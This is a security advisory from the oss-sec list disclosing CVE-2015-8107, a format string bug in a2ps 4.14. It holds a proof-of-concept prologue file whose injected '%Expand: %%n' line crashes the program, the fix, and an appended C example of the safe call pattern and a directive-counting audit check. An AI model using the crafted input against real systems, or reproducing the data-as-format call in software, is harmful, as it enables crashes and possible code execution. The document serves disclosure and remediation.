oss-sec mailing list archives
CVE-2015-8107 - a2ps(gnu) v4.14 format string vulnerability
From: 김종권 <jgkim () ropas snu ac kr>
Date: Mon, 16 Nov 2015 19:24:18 +0900
Dear List,

I am writing this to report a format string vulnerability in a2ps (4.14, which is the latest version). I have also already been assigned a CVE identifier from MITRE, "CVE-2015-8107", so I want to make this vulnerability public.
- Target Platform: Linux
- Target Version: 4.14 (Latest Version)
- Vulnerability description
When a user runs a2ps with a maliciously crafted pro (a2ps prologue) file, an attacker can execute arbitrary code.
The function output_file processes the %Expand command in the pro file. The variable `expansion' in the function output_file may hold a malicious input string, which can be used as the format argument of vsprintf.
-- Step 1. (output.c 524 line)
524   expansion = ((char *) expand_user_string (job, FIRST_FILE (job), (const uchar *) "Expand: requirement", (const uchar *) token));
For instance, the variable expansion will point to the string "%n" when a text line "%Expand: %%\n" exists in an input pro file.
-- Step 2. (output.c 525 line)
525   output (dest, expansion);
output() is called in line 525, and the argument `expansion' is used as a format string, which can be malicious, as described in step 1.
-- Step 3. (output.c 873 line)
182 void output (struct output * out, const char *format, ...)
{
  ...
202   ds_unsafe_cat_vsprintf (out->chunk, format, args);
  ...
The variable format, which can be malicious, is passed to ds_unsafe_cat_vsprintf() in line 202.
-- Step 4. (dstring.c 321 line)
321 void ds_unsafe_cat_vsprintf (struct dstring * ds, const char *format, va_list args)
{
  ...
326   vsprintf (ds->content + ds->len, format, args);
  ...
The value of format, which can be malicious, is used as the format argument of vsprintf in line 326; therefore arbitrary code can be executed.
-- Step 5. Our malicious input "exploit.pro"
===================================
% -*-postscript-*-
% PostScript Prologue
%
% $Id: matrix.pro,v 1.1.1.1.2.1 2007/12/29 01:58:27 mhatta Exp $
%

%
% This file is part of a2ps.
%
% This program is free software; you can redistribute it and/or modify
% it under the terms of the GNU General Public License as published by
% the Free Software Foundation; either version 3, or (at your option)
% any later version.
%
% This program is distributed in the hope that it will be useful,
% but WITHOUT ANY WARRANTY; without even the implied warranty of
% MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
% GNU General Public License for more details.
%
% You should have received a copy of the GNU General Public License
% along with this program; see the file COPYING.  If not, write to
% the Free Software Foundation, 59 Temple Place - Suite 330,
% Boston, MA 02111-1307, USA.
%

Documentation
The layout is the same as samp(bw)samp, but alternating gray and white
lines.

There are two macros defining the behavior:
samp(pro.matrix.cycle)samp defines the length of the cycle (number of
white and gray lines).  It defaults to 6.
samp(pro.matrix.gray)samp defines the number of gray lines.  Default is 3.
EndDocumentation

% -- code follows this line --
%%IncludeResource: file base.ps
%%IncludeResource: file a2ps.hdr

%%BeginResource: procset a2ps-matrix-Prolog 2.0 1
% Function T(ab), jumps to the n-th tabulation in the current line
/T { cw mul x0 add y0 moveto } bind def

% Function n: move to the next line
/n { %def
  /y0 y0 bfs sub store
  % Draw a grey background
  /nline nline 1 add def
  % @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
  % @@@@@@@@@@@@@@ Malicious user input @@@@@@@@@@@@@@@
  %Expand: %%n
  % @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
  %Expand: nline #{pro.matrix.cycle:-6} mod #{pro.matrix.gray:-3} ge {
    gsave
      newpath
      x v get y0 currentfont /Descent get currentfontsize mul add moveto
      pw 0 rlineto
      0 bfs rlineto
      pw neg 0 rlineto
      closepath
      0.9 setgray
      fill
    grestore
  } if
  x0 y0 moveto
} bind def

% Function N: show and move to the next line
/N { Show n } bind def
/S { Show } bind def

/p {
  false UL
  false BX
  %Face: Plain Courier bfs
  Show
} bind def

/sy {
  false UL
  false BX
  %Face: Symbol Symbol bfs
  Show
} bind def

/k {
  false UL
  false BX
  %Face: Keyword Courier-Oblique bfs
  Show
} bind def

/K {
  false UL
  false BX
  %Face: Keyword_strong Courier-Bold bfs
  Show
} bind def

/c {
  false UL
  false BX
  %Face: Comment Courier-Oblique bfs
  Show
} bind def

/C {
  false UL
  false BX
  %Face: Comment_strong Courier-BoldOblique bfs
  Show
} bind def

/l {
  false UL
  false BX
  %Face: Label Helvetica bfs
  Show
} bind def

/L {
  false UL
  false BX
  %Face: Label_strong Helvetica-Bold bfs
  Show
} bind def

/str{
  false UL
  false BX
  %Face: String Times-Roman bfs
  Show
} bind def

/e{
  false UL
  true BX
  %Face: Error Helvetica-Bold bfs
  Show
} bind def
%%EndResource

%%BeginSetup
% The font for line numbering
/f# /Helvetica findfont bfs .6 mul scalefont def
/nline 0 def
%%EndSetup
===================================
Execute
===================================
~ $ a2ps --version
GNU a2ps 4.14
Written by Akim Demaille, Miguel Santana.

Copyright (c) 1988-1993 Miguel Santana
Copyright (c) 1995-2000 Akim Demaille, Miguel Santana
Copyright (c) 2007- Akim Demaille, Miguel Santana and Masayuki Hatta
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
~ $ a2ps --prologue=exploit test.tex -o test.ps
aborted (core dumped)
===================================

- How to fix (output.c 525 line)
525   output (dest, expansion);
===>  output (dest, "%s", expansion);

- How we found the vulnerability
We used a static analyzer, Sparrow[1], to find the format string bug. Our analyzer reported an alarm at a2ps dstring.c line 326, so we looked into the a2ps source code and found the bug.
Sparrow is a state-of-the-art static analyzer that aims to verify the absence of fatal bugs in C source. Sparrow is designed on the basis of Abstract Interpretation, and the analysis is sound by design. Sparrow adopts a number of well-founded static analysis techniques[2,3] for scalability, precision, and user convenience.
References
[1]: http://ropas.snu.ac.kr/sparrow/
[2]: Selective Context-Sensitivity Guided by Impact Pre-Analysis. Hakjoo Oh, Wonchan Lee, Kihong Heo, Hongseok Yang, and Kwangkeun Yi. PLDI'14.
[3]: Design and Implementation of Sparse Global Analyses for C-like Languages. Hakjoo Oh, Kihong Heo, Wonchan Lee, Woosuk Lee, and Kwangkeun Yi. PLDI'12.
Sincerely,
Woosuk Lee & Jong-Gwon Kim

-----------------------------
Woosuk Lee
Ph.D. candidate
ROPAS lab. (http://ropas.snu.ac.kr/)
ROSAEC center (http://rosaec.snu.ac.kr/)
Seoul National University
(tel) +82-2-880-1865
(email) wslee () ropas snu ac kr
-----------------------------

-----------------------------
Jong-Gwon Kim
Graduate student
ROPAS lab. (http://ropas.snu.ac.kr/)
ROSAEC center (http://rosaec.snu.ac.kr/)
Seoul National University
(tel) +82-2-880-1865
(email) jgkim () ropas snu ac kr
-----------------------------
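The call chain described in the report, as an added C example that is not part of the original message and not a2ps's own code: a bounded stand-in for the dstring writer, an output() with the same variadic shape as a2ps's, the fixed call output(ds, "%s", expansion), and a small audit helper that counts the conversion directives printf would act on in a string that is about to be used as a format. The struct dstring layout, ds_cat_vsnprintf(), render_fixed() and count_directives() are illustrative names introduced here; expand_percent() is an assumption about what expand_user_string() does with a doubled percent in the prologue, modelled only as far as the report's "%%n" to "%n" example requires.

```c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Stand-in for a2ps's struct dstring (assumption: only content/len/size
 * matter for this demonstration; the real struct has more fields). */
struct dstring {
    char *content;
    size_t len;
    size_t size;
};

static void ds_init(struct dstring *ds) {
    ds->size = 64;
    ds->len = 0;
    ds->content = malloc(ds->size);
    if (!ds->content) abort();
    ds->content[0] = '\0';
}

/* Bounded replacement for ds_unsafe_cat_vsprintf(): measure first, grow the
 * buffer, then format. It still interprets `format`, so attacker-controlled
 * text must never reach this parameter. */
static void ds_cat_vsnprintf(struct dstring *ds, const char *format, va_list args) {
    va_list copy;
    va_copy(copy, args);
    int need = vsnprintf(NULL, 0, format, copy);
    va_end(copy);
    if (need < 0) return;
    while (ds->len + (size_t)need + 1 > ds->size) ds->size *= 2;
    char *grown = realloc(ds->content, ds->size);
    if (!grown) abort();
    ds->content = grown;
    vsnprintf(ds->content + ds->len, ds->size - ds->len, format, args);
    ds->len += (size_t)need;
}

/* Same shape as a2ps's output(): printf-style, variadic. Calling it as
 * output(ds, expansion) is the bug; output(ds, "%s", expansion) is the fix. */
static void output(struct dstring *ds, const char *format, ...) {
    va_list args;
    va_start(args, format);
    ds_cat_vsnprintf(ds, format, args);
    va_end(args);
}

/* Assumption about expand_user_string(): "%%" in the prologue text is
 * emitted as a single '%', so "%%n" in exploit.pro becomes "%n". */
static char *expand_percent(const char *in) {
    char *out = malloc(strlen(in) + 1);
    if (!out) abort();
    char *p = out;
    for (; *in; in++) {
        if (in[0] == '%' && in[1] == '%') { *p++ = '%'; in++; }
        else *p++ = *in;
    }
    *p = '\0';
    return out;
}

/* Audit helper: number of '%' sequences printf would treat as conversions
 * ("%%" is a literal percent and is not counted). Any non-zero result for a
 * string headed into a format parameter is a data-as-format bug. */
static int count_directives(const char *s) {
    int n = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }
        n++;
    }
    return n;
}

/* The fixed path from the advisory: the expansion is data, not a format.
 * Returns a heap string the caller frees. */
static char *render_fixed(const char *prologue_text) {
    char *expansion = expand_percent(prologue_text);
    struct dstring ds;
    ds_init(&ds);
    output(&ds, "%s", expansion);          /* was: output(&ds, expansion); */
    free(expansion);
    return ds.content;
}

int main(void) {
    const char *line = "%%n";              /* constructed: body of "%Expand: %%n" */
    char *expansion = expand_percent(line);
    printf("expansion = \"%s\", directives printf would act on = %d\n",
           expansion, count_directives(expansion));
    char *out = render_fixed(line);
    printf("fixed output = \"%s\"\n", out);
    free(expansion);
    free(out);
    return 0;
}
```

The vulnerable call itself is deliberately not executed here: handing "%n" to vsprintf with no matching argument is undefined behaviour, which is exactly why the a2ps run in the report ends in a core dump. What the example does show is the invariant the fix restores, that the rendered text equals the expansion byte for byte regardless of how many '%' it contains, and the kind of check (count_directives() on anything derived from a prologue) that a review of data-as-format call sites should apply.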